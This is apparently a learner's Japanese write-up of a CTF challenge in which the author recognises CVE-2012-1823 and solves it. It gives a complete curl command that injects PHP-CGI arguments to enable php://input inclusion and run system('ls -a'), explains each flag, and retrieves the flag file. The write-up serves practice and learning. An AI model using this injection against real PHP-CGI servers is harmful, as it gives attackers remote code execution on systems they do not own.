Hypertext Preprocessor
いったんアクセスしてみると
なんか2012:1823の形がCVEに見える気がしましたが、いったんこの文字列を検索するとCVE-2012-1823
が引っ掛かりました。
以下のサイトを参考にしました。
試してみる
https://ctfq.u1tramarine.blue/q12/index.php?-s
でアクセスすると
当たりでした。このディレクトリにFlag
があるという事です。
ダメもとで、/Flag.txt/
にアクセスしましたがダメでした。更に詳しく調べてみました。
任意のプログラムを実行させる
curl -X POST https://ctfq.u1tramarine.blue/q12/index.php?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input -d '<?php system("ls -a") ?>'
-d+allow_url_include%3DOn
と-d+auto_prepend_file%3Dphp://input
に分解できる
-d+allow_url_include%3DOn
まず、-d
はphp.ini の設定を一時的に上書きするPHPのオプションらしいです。
allow_url_include=On
は、PHPスクリプトをインクルードすることができます。
-d+auto_prepend_file%3Dphp://input
auto_prepend_file=php://input
はインクルードしたファイルの先頭で実行させる
-d <?php system("ls -a") ?>
これは実行したいプログラムです。
結果
実行すると、flag_flag_flag.txt
がありました。/flag_flag_flag.txt/
にアクセスするとFlag
ゲットです!
まとめ
CVEっぽいと気づけてうれしかったです。
結構悪用された脆弱性みたいで、知る機会ができて良かった。
明日も一日頑張ろう!